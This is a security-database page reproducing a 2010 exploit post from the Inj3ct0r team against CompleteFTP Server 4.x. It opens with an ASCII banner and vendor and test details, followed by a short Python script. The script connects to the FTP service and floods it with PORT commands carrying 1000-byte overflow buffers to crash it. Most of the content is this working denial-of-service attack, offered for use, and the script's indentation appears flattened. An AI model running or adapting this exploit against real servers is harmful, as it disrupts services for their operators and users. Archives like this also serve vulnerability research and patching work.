Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23922
HistoryMay 26, 2010 - 12:00 a.m.

CompleteFTP Server v 4.x "PORT" command Remote DOS exploit

2010-05-2600:00:00
vulners.com
11

CompleteFTP Server v 4.x "PORT" command Remote DOS exploit

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'`\ /\ \ /'`\ 0
0 /\, \ ___ /\\/\\ \ \ \ \ ,\/\ \/\ \ _ ___ 1
1 \/
/\ \ /' _ `\ \/\ \/
/
\< /'
\ \ \/\ \ \ \ \/\`'\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \
/\ \ \\ \ \\ \ \ \/ 1
1 \ \\ \\ \\\ \ \ \/\ \\\ \
\\ \/\ \\ 0
0 \/
/\/
/\/
/\ \\ \/
/ \// \// \// \// 1
1 \ \
/ >> Exploit database separated by exploit 0
0 \/
/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Vendor: www.enterprisedt.com
download: http://www.enterprisedt.com/products/completeftp/downloadlink.html
Credit and Thanks: all friends & all Hacker`s
Tested On: Windows XP (SP2 & SP3)

#!/usr/bin/python

import socket

print '---------------------------------------------------------------------'
print ' CompleteFTP Server v 4.x "PORT" command Remote Denial of Service'
print ' author: eidelweiss'
print ' mail: [email protected]'
print '---------------------------------------------------------------------'

buffer = "A" * 1000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1",21))
s.send('USER %s\r\n' % "test")

for i in range(1,69):
s.send('PORT %s\n\n' % buffer)
print "Sending request n. " + str(i)